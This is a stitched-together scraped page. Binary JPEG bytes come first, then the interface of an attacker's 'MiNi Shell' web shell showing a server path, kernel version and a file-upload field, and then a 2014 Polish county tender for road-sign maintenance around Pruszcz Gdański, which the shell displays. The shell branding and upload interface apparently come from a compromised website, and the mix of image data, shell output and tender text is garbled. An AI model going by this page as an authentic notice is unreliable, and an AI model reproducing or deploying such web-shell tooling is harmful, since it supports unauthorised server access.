JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140121/13549-N-2014.html

<p class="kh_header"><b>Pruszcz Gdański: Nazwa nadana zamówieniu przez zamawiającego
Wykonanie usługi związanej z utrzymaniem oznakowania   polegającego na:  
 - oznakowaniu pionowym
- oznakowaniu poziomym
   dróg powiatowych położonych na terenie Powiatu Gdańskiego w 2014 r.</b><br>
<b>Numer ogłoszenia: 13549 - 2014; data zamieszczenia: 21.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nazwa nadana zamówieniu przez zamawiającego
Wykonanie usługi związanej z utrzymaniem oznakowania   polegającego na:  
 - oznakowaniu pionowym
- oznakowaniu poziomym
   dróg powiatowych położonych na terenie Powiatu Gdańskiego w 2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia  jest Wykonanie usługi związanej z utrzymaniem oznakowania   polegającego na:  
 - oznakowaniu pionowym
- oznakowaniu poziomym
   dróg powiatowych położonych na terenie Powiatu Gdańskiego w 2014 r.
2.  Zakres przedmiotu zamówienia:
ZADANIE NR 1 - OZNAKOWANIE PIONOWE 
Zakres robót i usług obejmuje:
- zakupienie  znaków  drogowych, słupków i obejm do mocowania znaków: wymiary znaków drogowych  -  grupa  wielkości  znaków  średnie, liternictwo, symbole i kolorystyka i inne wg Rozporządzenia na koszt Wykonawcy;
- wykonanie konstrukcji do znaków drogowych;
- ustawienie słupków do znaków;
- zamocowanie tablic znaków drogowych;
- ustawienie słupków z rur stalowych fi 70 mm;
- przymocowanie tablic znaków drogowych do słupków lub masztów.
Znak pionowy - znak wykonany w postaci tarczy lub tablicy z napisami albo symbolami, zwykle umieszczony na konstrukcji wsporczej.
Tarcza znaku - element konstrukcyjny, na powierzchni, którego umieszczana jest treść znaku.
Tarcza może być wykonana z różnych materiałów (stal, aluminium, tworzywa syntetyczne itp.) - jako jednolita lub składana.
Producent zakupionych materiałów tj. znaków drogowych winien posiadać:
- certyfikat uprawniający do oznakowania  wyrobów  znakiem  bezpieczeństwa B dla  znaków   drogowych  pionowych  nie odblaskowych  i odblaskowych  wydany przez Instytut Transportu Samochodowego,
- świadectwo  kwalifikacji  dot.  produkcji  znaków  i  tablic  drogowych   oraz  wykonywania pionowego oznakowania dróg wydane przez Instytut Badawczy Dróg i Mostów.Przed przystąpieniem do robót Wykonawca jest zobowiązany do oznakowania rejonu robót  zgodnie z Rozporządzeniem.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac. Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 10A do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5A do niniejszej specyfikacji.
 Zamawiający zastrzega sobie możliwość zmiany ilości poszczególnych pozycji oznakowania  pionowego w zależności od potrzeb bieżących przy zachowaniu ogólnej kwoty umownej.
 Zamawiający  dopuszcza  powierzenie   wykonania   części   zamówienia  Podwykonawcy/  Podwykonawcom, zgodnie z art. 36a ust.1 Ustawy.
  W  przypadku  zatrudnienia  podwykonawcy/ podwykonawców,  w oparciu o art. 36 b ust. 1 Ustawy  Zamawiający  żąda  wskazania  przez  Wykonawcę  w  ofercie  informacji na  temat  części zamówienia,  których wykonanie zamierza powierzyć podwykonawcom (wzór  zał. nr 8 do SIWZ). 
UWAGA:
W przypadku uszkodzenia oznakowania pionowego, stwarzającego sytuację zagrożenia bezpieczeństwa ruchu drogowego, Wykonawca winien je naprawić lub wymienić w ciągu 24 h od zgłoszenia telefonicznego przez Zamawiającego.
ZADANIE NR 2 - OZNAKOWANIE POZIOME
Oznakowanie poziome - znaki drogowe poziome, umieszczone na nawierzchni w postaci linii ciągłych lub przerywanych, pojedynczych lub podwójnych, strzałek, napisów, symboli oraz innych linii związanych z oznaczeniem określonych miejsc na tej nawierzchni.
Zakres robót i usług obejmuje:
1. Malowanie  mechaniczne /odnawianie/cienkowarstwowo/  linii segregacyjnych 
i krawędziowych ciągłych, przerywanych, linii na przejściach dla pieszych, strzałek i innych znaków w ilości do 5.000 m2. Materiałami do znakowania są przede wszystkim farby  jednoskładnikowe rozpuszczalnikowe, farby typu HS - high solid, farby wodorozcieńczalne, farby szybkoschnące, farby dwuskładnikowe chemoutwardzalne nakładane warstwą grubości od 0,3 mm do 0,8 mm (na mokro).
2.Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 10B do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5B do niniejszej specyfikacji.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac.
 3. Zamawiający  dopuszcza  powierzenie   wykonania   części   zamówienia  Podwykonawcy/ Podwykonawcom, zgodnie z art. 36a ust.1 Ustawy.
4.  W  przypadku  zatrudnienia  podwykonawcy/ podwykonawców,  w oparciu o art. 36 b ust. 1 Ustawy  Zamawiający  żąda  wskazania  przez  Wykonawcę  w  ofercie  informacji na  temat  części zamówienia,  których wykonanie zamierza powierzyć podwykonawcom (wzór  zał. nr 8 do SIWZ). 
UWAGA:
Zamawiający zastrzega sobie możliwość zmniejszenie zakresu przedmiotu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie  z  art. 36  ust. 2,  pkt.  3  ustawy,  Zamawiający  przewiduje  możliwość  udzielenia w okresie trwania umowy ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8, 45.23.32.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium wnosi się przed upływem terminu składania ofert.
2.Wykonawca zobowiązany jest do wniesienia wadium w wysokości 1.200,00 zł (słownie: tysiąc dwieście złotych 00/100 ) dla zadania nr 1 oraz dla zadania nr 2 w wysokości 700,00 zł (słownie: siedemset złotych 00/100), najpóźniej w dniu składania ofert przed godz. 11.30 dnia 30.01.2014r. W przypadku jeżeli do godz. 11:30 dnia 30.01.2014r. nie wpłynie wymagana kwota wadium na konto Zamawiającego, będzie to oznaczało, że wadium nie zostało wniesione.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się prowadzeniem działalności gospodarczej w zakresie związanym z utrzymaniem oznakowania pionowego i poziomego (wymianie/montażu/naprawie oznakowania).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się wykonaniem w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy- tym okresie, minimum 2 usług odpowiadających swym rodzajem i wartością usługom stanowiącym przedmiot zamówienia (z podaniem ich wartości oraz daty wykonania i podmiotów na rzecz których usługi zostały wykonane) tj.: utrzymaniu oznakowania pionowego (zad. nr 1)- (wymianie/montażu/naprawie oznakowania) i oznakowania poziomego (zad. nr 2) - o wartości minimum 30.000,00 zł łącznie wraz z dokumentami potwierdzającymi należyte wykonanie tych usług, (wzór załączniki nr 6 do SIWZ). Do każdego z zadań należy załączyć osobny wykaz wykonanych usług zgodny z zakresem przedmiotowym poszczególnych zadań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni  warunek za spełniony, gdy Wykonawcy wykażą się dysponowaniem co najmniej 1 pracownikiem, który będzie wykonywać zamówienie i który:Posiada doświadczenie (praktykę) w zakresie prac związanych z utrzymaniem oznakowania pionowego i poziomego (wymianie/ montażu/ naprawie oznakowania), posiadającym uprawnienia niezbędne do realizacji przedmiotu zamówienia.
W tym celu należy do oferty dołączyć wypełnione oświadczenie- zał. nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (wzór zał. nr 1A, 1B do SIWZ),
2. Formularz cenowy (wzór zał. nr 4A, 4B do SIWZ), 
3. Podpisany wzór umowy (załącznik nr 5A, 5B do SIWZ),
4.Wykaz wykonanych usług (zał. nr 6 do SIWZ),
5. Oświadczenie o posiadanym potencjale kadrowym (zał. nr 7  do SIWZ),
6. Informacja na temat części zamówienia, których wykonanie  Wykonawca zamierza powierzyć Podwykonawcom (wzór zał.  nr 8 do SIWZ),
7.Oświadczenie o przynależności do grupy kapitałowej  (zał. nr 9 do SIWZ),
8. Potwierdzenie  wniesienia wadium: potwierdzenie   dokonanego   przelewu lub  oryginał wraz z potwierdzoną kopią dokumentu stanowiącego wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia  zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na wykonanie przedmiotu zamówienia, w tym zmiany stawki podatku VAT, mające wpływ na wysokość ceny brutto za świadczoną usługę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122. Specyfikacja nieodpłatna  -  ewentualne koszty przesyłki ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2014 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101
Termin otwarcia ofert: 30.01.2014 r., o godz. 12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 - OZNAKOWANIE PIONOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 - OZNAKOWANIE PIONOWE 
Zakres robót i usług obejmuje:
- zakupienie  znaków  drogowych, słupków i obejm do mocowania znaków: wymiary znaków drogowych  -  grupa  wielkości  znaków  średnie, liternictwo, symbole i kolorystyka i inne wg Rozporządzenia na koszt Wykonawcy;
- wykonanie konstrukcji do znaków drogowych;
- ustawienie słupków do znaków;
- zamocowanie tablic znaków drogowych;
- ustawienie słupków z rur stalowych fi 70 mm;
- przymocowanie tablic znaków drogowych do słupków lub masztów.
Znak pionowy - znak wykonany w postaci tarczy lub tablicy z napisami albo symbolami, zwykle umieszczony na konstrukcji wsporczej.
Tarcza znaku - element konstrukcyjny, na powierzchni, którego umieszczana jest treść znaku.
Tarcza może być wykonana z różnych materiałów (stal, aluminium, tworzywa syntetyczne itp.) - jako jednolita lub składana.
Producent zakupionych materiałów tj. znaków drogowych winien posiadać:
- certyfikat uprawniający do oznakowania  wyrobów  znakiem  bezpieczeństwa B dla  znaków   drogowych  pionowych  nie odblaskowych  i odblaskowych  wydany przez Instytut Transportu Samochodowego,
- świadectwo  kwalifikacji  dot.  produkcji  znaków  i  tablic  drogowych   oraz  wykonywania  pionowego oznakowania dróg wydane przez Instytut Badawczy Dróg i Mostów.Przed przystąpieniem do robót Wykonawca jest zobowiązany do oznakowania rejonu robót  zgodnie z Rozporządzeniem.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac. Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 10A do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5A do niniejszej specyfikacji. Zamawiający zastrzega sobie możliwość zmiany ilości poszczególnych pozycji oznakowania pionowego w zależności od potrzeb bieżących przy zachowaniu ogólnej kwoty umownej. Zamawiający  dopuszcza  powierzenie   wykonania   części   zamówienia  Podwykonawcy/  Podwykonawcom, zgodnie z art. 36a ust.1 Ustawy. W  przypadku  zatrudnienia  podwykonawcy/ podwykonawców,  w oparciu o art. 36 b ust. 1  Ustawy  Zamawiający  żąda  wskazania  przez  Wykonawcę  w  ofercie  informacji na  temat  części zamówienia,  których wykonanie zamierza powierzyć podwykonawcom (wzór zał. nr 8 do SIWZ). 

UWAGA:
W przypadku uszkodzenia oznakowania pionowego, stwarzającego sytuację zagrożenia bezpieczeństwa ruchu drogowego, Wykonawca winien je naprawić lub wymienić w ciągu 24 h od zgłoszenia telefonicznego przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 - OZNAKOWANIE POZIOME.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 - OZNAKOWANIE POZIOME
Oznakowanie poziome - znaki drogowe poziome, umieszczone na nawierzchni w postaci linii ciągłych lub przerywanych, pojedynczych lub podwójnych, strzałek, napisów, symboli oraz innych linii związanych z oznaczeniem określonych miejsc na tej nawierzchni.
Zakres robót i usług obejmuje:
1. Malowanie  mechaniczne /odnawianie/cienkowarstwowo/  linii segregacyjnych 
i krawędziowych ciągłych, przerywanych, linii na przejściach dla pieszych, strzałek i innych znaków w ilości do 5.000 m2. Materiałami do znakowania są przede wszystkim farby  jednoskładnikowe rozpuszczalnikowe, farby typu HS - high solid, farby wodorozcieńczalne, farby szybkoschnące, farby dwuskładnikowe chemoutwardzalne nakładane warstwą grubości od 0,3 mm do 0,8 mm (na mokro).
2.Szczegółowy zakres przedmiotu zamówienia określa specyfikacja techniczna stanowiąca  załącznik nr 10B do niniejszej specyfikacji istotnych warunków zamówienia i wzór umowy stanowiący załącznik nr 5B do niniejszej specyfikacji.
Realizacja przedmiotu zamówienia następować będzie po dokonywanym objeździe dróg powiatowych przez upoważnionego przedstawiciela Wykonawcy i Zamawiającego, w oparciu o który ustalony będzie zakres i termin realizacji poszczególnych prac.
 3. Zamawiający  dopuszcza  powierzenie   wykonania   części   zamówienia  Podwykonawcy/  Podwykonawcom, zgodnie z art. 36a ust.1 Ustawy.
4.  W  przypadku  zatrudnienia  podwykonawcy/ podwykonawców,  w oparciu o art. 36 b ust. 1  Ustawy  Zamawiający  żąda  wskazania  przez  Wykonawcę  w  ofercie  informacji na   temat  części zamówienia,  których wykonanie zamierza powierzyć podwykonawcom (wzór   zał. nr 8 do SIWZ). 
UWAGA:
Zamawiający zastrzega sobie możliwość zmniejszenie zakresu przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com